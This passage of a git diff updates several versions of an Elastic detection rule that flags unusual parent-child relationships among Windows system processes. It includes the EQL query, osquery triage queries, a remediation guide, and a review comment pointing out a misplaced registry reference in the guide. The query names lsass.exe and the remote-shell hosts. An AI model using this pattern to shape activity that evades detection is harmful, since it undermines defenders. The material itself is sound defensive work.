accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not 
process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n",
 "references": [
 "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png",
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json
index 4edb3fa4cd2..bed8d321e89 100644
--- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_106.json
@@ -14,7 +14,7 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unusual Parent-Child Relationship",
- "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
+ "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not 
process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", 
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json
index b334ed14fce..4fe5686901e 100644
--- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not 
process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", 
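Review bot: The investigation step "Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification" in the new `note` line anchors the account review on a registry modification, but this rule fires on a process start with an unexpected parent or child and no registry event is part of the alert, so analysts following the guide are pointed at the wrong time window. Suggest `Analysts can do this by searching for login events (for example, 4624) to the target host around the time of the alerted process start.` The same sentence is carried in the other revisions of this rule in this diff; since these JSON files look like exported rule artifacts, the wording fix presumably belongs in the upstream rule source rather than in this export.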
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json
index 3f565934c74..e5efe725871 100644
--- a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
